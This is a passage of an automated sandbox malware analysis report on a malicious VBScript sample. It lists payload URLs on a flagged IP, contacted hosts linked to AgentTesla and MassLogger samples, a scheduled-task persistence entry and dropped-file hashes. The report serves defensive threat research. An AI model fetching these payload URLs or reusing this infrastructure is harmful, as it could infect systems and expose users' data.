                                http://144.91.79.54/2412/filewscript.exe, 00000000.00000003.2123186894.000001930574F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115049431.00000193059D9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121950926.000001930574B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125683822.0000019305750000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115256128.0000019305741000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://144.91.79.54/2412/s8Owscript.exe, 00000000.00000003.2105634223.0000019303A87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2105710801.0000019303A89000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://144.91.79.54/2412/r8Owscript.exe, 00000000.00000003.2110586290.0000019303A87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110457845.0000019303A87000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://144.91.79.54/2412/cnwscript.exe, 00000000.00000003.2115256128.0000019305741000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://144.91.79.54/wscript.exe, 00000000.00000003.2110457845.0000019303A87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110457845.0000019303A63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2106079195.0000019303A47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110848703.0000019303A47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2105671132.0000019303A63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2106027765.0000019303A63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110681597.0000019303A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://144.91.79.54/2412/rdNwscript.exe, 00000000.00000003.2110586290.0000019303A87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110457845.0000019303A87000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://144.91.79.54/2412/rdwscript.exe, 00000000.00000003.2110586290.0000019303A87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110457845.0000019303A87000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMSBuild.exe, 00000005.00000002.3346351856.0000000002661000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://144.91.79.5wscript.exe, 00000000.00000003.2110848703.0000019303A47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110681597.0000019303A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  144.91.79.54
                                  		unknownGermany
                                  		51167CONTABODEtrue
                                  162.254.34.31
                                  		unknownUnited States
                                  		64200VIVIDHOSTINGUStrue
                                  172.67.74.152
                                  		api.ipify.orgUnited States
                                  		13335CLOUDFLARENETUSfalse

                                  General Information

                                  Joe Sandbox version:42.0.0 Malachite
                                  Analysis ID:1592175
                                  Start date and time:2025-01-15 21:26:25 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 5m 43s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:11
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:009.vbe
                                  Detection:MAL
                                  Classification:mal100.spre.troj.spyw.expl.evad.winVBE@9/12@1/3
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 59
                                  • Number of non-executed functions: 7
                                  Cookbook Comments:
                                  • Found application associated with file extension: .vbe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 40.126.32.140, 40.126.32.72, 20.190.160.17, 40.126.32.76, 40.126.32.136, 40.126.32.74, 20.190.160.22, 20.190.160.20, 199.232.210.172, 2.17.190.73, 4.245.163.56, 40.69.42.241, 52.168.117.173, 20.3.187.198, 199.232.214.172, 13.107.253.45
                                  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, e3913.cd.akamaiedge.net, otelrules.afd.azureedge.net, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, cac-ocsp.digicert.com.edgekey.net, fe3.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  15:27:23API Interceptor12x Sleep call for process: wscript.exe modified
                                  15:27:28API Interceptor40x Sleep call for process: powershell.exe modified
                                  15:27:33API Interceptor19x Sleep call for process: MSBuild.exe modified
                                  15:27:51API Interceptor1x Sleep call for process: wermgr.exe modified
                                  21:27:24Task SchedulerRun new task: bEvujIIdkyIbOgF path: C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  144.91.79.540969686.vbeGet hashmaliciousAgentTeslaBrowse
                                  • 144.91.79.54/2412/regOwiR4EFZZGKetHoUY.txt
                                  Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                  • 144.91.79.54/1211/file
                                  Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                  • 144.91.79.54/1211/file
                                  BankInformation.vbeGet hashmaliciousAgentTeslaBrowse
                                  • 144.91.79.54/1211/file
                                  Ref#2073306.vbeGet hashmaliciousMicroClipBrowse
                                  • 144.91.79.54/0911/file
                                  SWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                  • 144.91.79.54/0911/file
                                  Ref#130709.vbeGet hashmaliciousMassLogger RATBrowse
                                  • 144.91.79.54/0911/file
                                  MV EAGLE EYE RFQ-92008882920-PDF.vbsGet hashmaliciousUnknownBrowse
                                  • 144.91.79.54/2210/file
                                  Urgent Quotation documents One Pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                  • 144.91.79.54/2210/file
                                  162.254.34.310969686.vbeGet hashmaliciousAgentTeslaBrowse
                                    50201668.exeGet hashmaliciousMassLogger RATBrowse
                                      rRef6010273.exeGet hashmaliciousAgentTeslaBrowse
                                        rCHARTERREQUEST.exeGet hashmaliciousAgentTeslaBrowse
                                          VYLigyTDuW.exeGet hashmaliciousAgentTeslaBrowse
                                            Ref#66001032.exeGet hashmaliciousAgentTeslaBrowse
                                              Ref#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                  Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                    172.67.74.152jgbC220X2U.exeGet hashmaliciousUnknownBrowse
                                                    • api.ipify.org/?format=text
                                                    malware.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                                    • api.ipify.org/
                                                    Simple1.exeGet hashmaliciousUnknownBrowse
                                                    • api.ipify.org/
                                                    Simple2.exeGet hashmaliciousUnknownBrowse
                                                    • api.ipify.org/
                                                    systemConfigChecker.exeGet hashmaliciousUnknownBrowse
                                                    • api.ipify.org/
                                                    systemConfigChecker.exeGet hashmaliciousUnknownBrowse
                                                    • api.ipify.org/
                                                    2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                    • api.ipify.org/
                                                    Zc9eO57fgF.elfGet hashmaliciousUnknownBrowse
                                                    • api.ipify.org/
                                                    67065b4c84713_Javiles.exeGet hashmaliciousRDPWrap ToolBrowse
                                                    • api.ipify.org/
                                                    Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                    • api.ipify.org/

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    bg.microsoft.map.fastly.netMystery_Check.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                    • 199.232.210.172
                                                    g6lWBM64S4.msiGet hashmaliciousUnknownBrowse
                                                    • 199.232.210.172
                                                    1647911459241874440.jsGet hashmaliciousStrela DownloaderBrowse
                                                    • 199.232.210.172
                                                    0430tely.pdfGet hashmaliciousUnknownBrowse
                                                    • 199.232.210.172
                                                    Order.xlsGet hashmaliciousUnknownBrowse
                                                    • 199.232.210.172
                                                    Order.xlsGet hashmaliciousUnknownBrowse
                                                    • 199.232.210.172
                                                    hNgIvHRuTU.dllGet hashmaliciousWannacryBrowse
                                                    • 199.232.214.172
                                                    ACH REMITTANCE DOCUMENT 15.01.25.xlsbGet hashmaliciousUnknownBrowse
                                                    • 199.232.214.172
                                                    Personliche Nachricht fur e4060738.pdfGet hashmaliciousUnknownBrowse
                                                    • 199.232.214.172
                                                    https://drive.google.com/file/d/1dNrtjTqb59ZQTE3gUuVhSjEbFXuJRXW7/view?usp=sharing&ts=6786e61fGet hashmaliciousUnknownBrowse
                                                    • 199.232.214.172
                                                    s-part-0017.t-0009.fb-t-msedge.netdownload.ps1Get hashmaliciousUnknownBrowse
                                                    • 13.107.253.45
                                                    Zohobooks Voip CaIIer left (4) voice message from +1 (___) ___-__92 [MSG ID-zNeaDpAKAIgeQjKGl].emlGet hashmaliciousHTMLPhisherBrowse
                                                    • 13.107.253.45
                                                    https://u13762205.ct.sendgrid.net/ls/click?upn=u001.2N-2FFSd8Mh5tdTcK2pEXUToH0F5-2Fq3FDo8pnKFzcXMK24EOVQRPQXOzov3WP6TeQDbpOFMAzOhzk6g52qaRBXMg-3D-3DIjNL_PKcFXsnzduNOkTk1M1BuFSXBwpDtJ5JnfBBGS8mWfSDpSIzzZrzaRAqzsWn9I2SACyGbOCQAHofmU9ue-2Bfpl8m5UVDAXfATbU3zHgCM2w6TpOzhFbmwlUQoZzHTxRoJD6sBCzgzJz3SY7rmsp-2BquYHmL2DTOkQggmMFIfKhNPVaBf8NTmimDBPZdcr9YqjF8L6hryY10MBbjsSOUH778gw-3D-3DGet hashmaliciousUnknownBrowse
                                                    • 13.107.253.45
                                                    https://www.databreachtoday.com/showOnDemand.php?webinarID=6054&rf=OD_REQUEST;Get hashmaliciousUnknownBrowse
                                                    • 13.107.253.45
                                                    https://guidantmeasurement-dot-level-district-447409-i0.as.r.appspot.com/Get hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                                                    • 13.107.253.45
                                                    29617afb-25a0-12a3-3c27-9464d2b37792.emlGet hashmaliciousUnknownBrowse
                                                    • 13.107.253.45
                                                    https://eventor.orienteering.asn.au/Home/RedirectToLivelox?redirectUrl=https%3A%2F%2Farchive1.diqx8fescpsb0.amplifyapp.com%2Fm1%2Fenvelope%2Fdocument%2Fcontent%2F4086Get hashmaliciousUnknownBrowse
                                                    • 13.107.253.45
                                                    9179390927_20250115_155451.htmlGet hashmaliciousHTMLPhisherBrowse
                                                    • 13.107.253.45
                                                    https://www.pdfforge.org/pdfcreator?srsltid=AfmBOoq1lpA5qNxfcLUyxjmEXAioeKYtqPTpBsIbZ5VOdq3uhOg1WclGGet hashmaliciousUnknownBrowse
                                                    • 13.107.253.45
                                                    http://jfdhq.offerpeercheck.comGet hashmaliciousUnknownBrowse
                                                    • 13.107.253.45
                                                    api.ipify.orghttps://adelademable.org/abujguyaleon.htmlGet hashmaliciousUnknownBrowse
                                                    • 104.26.12.205
                                                    0969686.vbeGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.13.205
                                                    NEW SHIPPING DOCUMENTS.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.13.205
                                                    new order.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.13.205
                                                    https://savory-sweet-felidae-psrnd.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                    • 104.26.12.205
                                                    http://loginmicrosoftonline.al-mutaheda.com/expiration/notice/nRrRc/receiving@accel-inc.comGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.26.12.205
                                                    Employee_Salary_Update.docxGet hashmaliciousUnknownBrowse
                                                    • 104.26.12.205
                                                    q9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                                                    • 104.26.13.205
                                                    https://www.explorium.ai/notice-of-processing-for-eu-residents/?email=fabrice.duval@socotec.comGet hashmaliciousUnknownBrowse
                                                    • 104.26.12.205
                                                    https://www.explorium.ai/notice-of-processing-for-eu-residents/?email=fabrice.duval@socotec.comGet hashmaliciousUnknownBrowse
                                                    • 104.26.12.205

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    VIVIDHOSTINGUS0969686.vbeGet hashmaliciousAgentTeslaBrowse
                                                    • 162.254.34.31
                                                    spc.elfGet hashmaliciousUnknownBrowse
                                                    • 216.157.141.83
                                                    meth15.elfGet hashmaliciousMiraiBrowse
                                                    • 64.190.116.33
                                                    50201668.exeGet hashmaliciousMassLogger RATBrowse
                                                    • 162.254.34.31
                                                    rRef6010273.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 162.254.34.31
                                                    rCHARTERREQUEST.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 162.254.34.31
                                                    VYLigyTDuW.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 162.254.34.31
                                                    Ref#66001032.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 162.254.34.31
                                                    Ref#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 162.254.34.31
                                                    CONTABODExd.arm7.elfGet hashmaliciousMiraiBrowse
                                                    • 80.241.211.156
                                                    0969686.vbeGet hashmaliciousAgentTeslaBrowse
                                                    • 144.91.79.54
                                                    trow.exeGet hashmaliciousUnknownBrowse
                                                    • 5.189.128.121
                                                    17366735083ba4993c0ae9322c32aacf9286de757a918f634b522467c19ad3da2352651d39438.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    • 213.136.81.72
                                                    8L6MBxaJ2m.exeGet hashmaliciousFormBookBrowse
                                                    • 161.97.142.144
                                                    fqbVL4XxCr.exeGet hashmaliciousFormBookBrowse
                                                    • 161.97.142.144
                                                    plZuPtZoTk.exeGet hashmaliciousFormBookBrowse
                                                    • 161.97.142.144
                                                    1SxKeB4u0c.exeGet hashmaliciousFormBookBrowse
                                                    • 161.97.142.144
                                                    uG3I84bQEr.exeGet hashmaliciousFormBookBrowse
                                                    • 161.97.142.144
                                                    CLOUDFLARENETUSAcrobat_Set-Up.exeGet hashmaliciousUnknownBrowse
                                                    • 104.18.32.77
                                                    Mystery_Check.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                    • 104.18.91.62
                                                    https://youtube.com%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%Get hashmaliciousUnknownBrowse
                                                    • 104.17.25.14
                                                    https://escooterzone.com/play.htmlGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                    • 172.67.216.225
                                                    https://bigbazaar.com.co/Get hashmaliciousUnknownBrowse
                                                    • 104.18.86.42
                                                    g6lWBM64S4.msiGet hashmaliciousUnknownBrowse
                                                    • 104.21.16.1
                                                    https://file-exchange.doc-extension.com/HXxGM/Get hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.25.14
                                                    Handler.exeGet hashmaliciousDanaBot, PureLog Stealer, VidarBrowse
                                                    • 172.64.41.3
                                                    https://fingertip.com/incoming-documentGet hashmaliciousHTMLPhisherBrowse
                                                    • 172.67.40.50
                                                    https://www.google.com.tr/url?sa==SlzLhhFsJ7fGjpM8fvOAkm1z4KC&rct=fETOvblSpCqm85GTYKVdXKip5bkW26kcBgD7HeLR8E6psRE86jAuyRjA7fyhhYHpWk&sa=t&url=amp/sasaol.com/ccy/ptsd/vTd7ocRQy71kDqeKXneUsLH4CLz/YWxpc29uLnNtaXRoQHJic2ludC5jb20=Get hashmaliciousUnknownBrowse
                                                    • 172.67.196.214

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0eQQE81XYXon.dllGet hashmaliciousWannacryBrowse
                                                    • 172.67.74.152
                                                    new-riii-1-b.pub.htaGet hashmaliciousLummaCBrowse
                                                    • 172.67.74.152
                                                    https://login.ecoleterradeasltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725581254870614.NzQzNDkzODMtOTc3Ni00MTk4LWEyOTgtNzcxOTE2NjUxYzRiMGVmZDU5N2MtN2U3NC00YjUwLTkxMzUtNTE5MGUwYzg1ZmQ2&ui_locales=en-US&mkt=en-US&client-request-id=36d4a1f6-7cba-45d1-a3ed-df92000d1eff&state=HfQ7BQGkYjqSuhdp0uw1pmK7OnWuMWuL6CrtRUQFTAqayUvi4HK2WHpRg3qXyBpviEzEkkPrHxRuxUPhbVJ6VT_z1Q4rknsdO1I1G8I0vvmCJKY1Jj17UvvXfl7rwwbByhZiSjZv4e0zjm8vBEwSjLmzdF29N_NteyY8M7drEpkBEAgCB0EoFXswqlG9707goDIQqjTpA0BHvdohyO5aj-tJFO1J-Wz2owkKr6bkCNZlxKE53oI2XKYpyD1GEC2x5jHgmT1f4Yrr9BPkhEeMCw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0Get hashmaliciousUnknownBrowse
                                                    • 172.67.74.152
                                                    random.exeGet hashmaliciousLiteHTTP BotBrowse
                                                    • 172.67.74.152
                                                    f5mfkHLLVe.dllGet hashmaliciousWannacryBrowse
                                                    • 172.67.74.152
                                                    hNgIvHRuTU.dllGet hashmaliciousWannacryBrowse
                                                    • 172.67.74.152
                                                    lummm_lzmb.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.74.152
                                                    2lX8Z3eydC.dllGet hashmaliciousWannacryBrowse
                                                    • 172.67.74.152
                                                    aASfOObWpW.exeGet hashmaliciousUnknownBrowse
                                                    • 172.67.74.152

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_b4b21b9272f0623778607a435112f88140f556cc_00000000_b22f938c-8372-4bf2-9794-99185ba16953\Report.wer

                                                    Download File
                                                    Process:C:\Windows\System32\wermgr.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.5347245515993327
                                                    Encrypted:false
                                                    SSDEEP:96:NJFTjQ+rxYid6BRH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTABnf/VXT5NH:7NjmG6BR30wAAzuiFpZ24lO8
                                                    MD5:89C8FD736BFC92D70DB54975789B18D6
                                                    SHA1:B21A43A0EEF572F0A2DD5CE6F144D03BFD2257A8
                                                    SHA-256:F07C8B52B33C0C29C09272ED33889C333F00767A8865E0EF9E9D42286D3C4954
                                                    SHA-512:BFD48E31356535A7C58E404BA1EC95CD741B948A7836E64325BB6EED5C72E23DBDD75FA86CEBB556E86BCC334AB734AEF20099C8427D2EB1DC11D2FA9198FC2A
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.4.4.6.6.9.3.6.0.1.2.5.5.1.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.4.4.6.4.5.2.8.3.3.1.1.7.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.2.2.f.9.3.8.c.-.8.3.7.2.-.4.b.f.2.-.9.7.9.4.-.9.9.1.8.5.b.a.1.6.9.5.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.7.4.-.0.0.0.1.-.0.0.1.4.-.c.8.a.7.-.8.4.e.3.8.b.6.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC0F0.tmp.WERInternalMetadata.xml

                                                    Download File
                                                    Process:C:\Windows\System32\wermgr.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):7414
                                                    Entropy (8bit):3.6862432953872517
                                                    Encrypted:false
                                                    SSDEEP:96:RSIU6o7wVetb8RCCBr7eCM6Y8bu3hgmfHNV9reKI65aMTTom:R6l7wVeJ8RCCBI6Y8buxgmftqspTTom
                                                    MD5:7D6402212401D972C6840F0775BE85A2
                                                    SHA1:CDDCCA22A7AB167B8151874128A1156E49C71659
                                                    SHA-256:8091BB22E11913E4930BAEDDD9507854F89C205C7E47893D03A7069E76ADE2A5
                                                    SHA-512:0DDACA5777C2C763CFF51F45422F4402995B468F8A0CF9744F5E819E86A359FBD4361712B45B4E9B7943A9D593F171826689CEEF2DCAE20F74F02540E103B94E
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.0.4.<./.P.i.

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC120.tmp.xml

                                                    Download File
                                                    Process:C:\Windows\System32\wermgr.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4899
                                                    Entropy (8bit):4.574548020508516
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zsLJg771I9sPWpW8VYJYm8M4JFKlnOtSFuyq8vT0OtNYytfe+d:uIjflI77e7VhJFKln8WT0zufFd
                                                    MD5:8262EB19E9CBBB24652832DD14714B78
                                                    SHA1:825702E0CF238E039ADABCF59C4D48A7E82ED6C0
                                                    SHA-256:3D464D0320EE0B55DC981072912658AB6A7044C8EFB6E222D37F73A5EA2EDBF5
                                                    SHA-512:A5964AA846635FB6B0BD6F2BD870E4BB1ED8186A3168D5DDAA28A433E1F5E45D90D7E96E910B1A7622530419BE38F4AD982D0771342454198B5F5BE5F4CF5497
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="677490" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):11887
                                                    Entropy (8bit):4.901437212034066
                                                    Encrypted:false
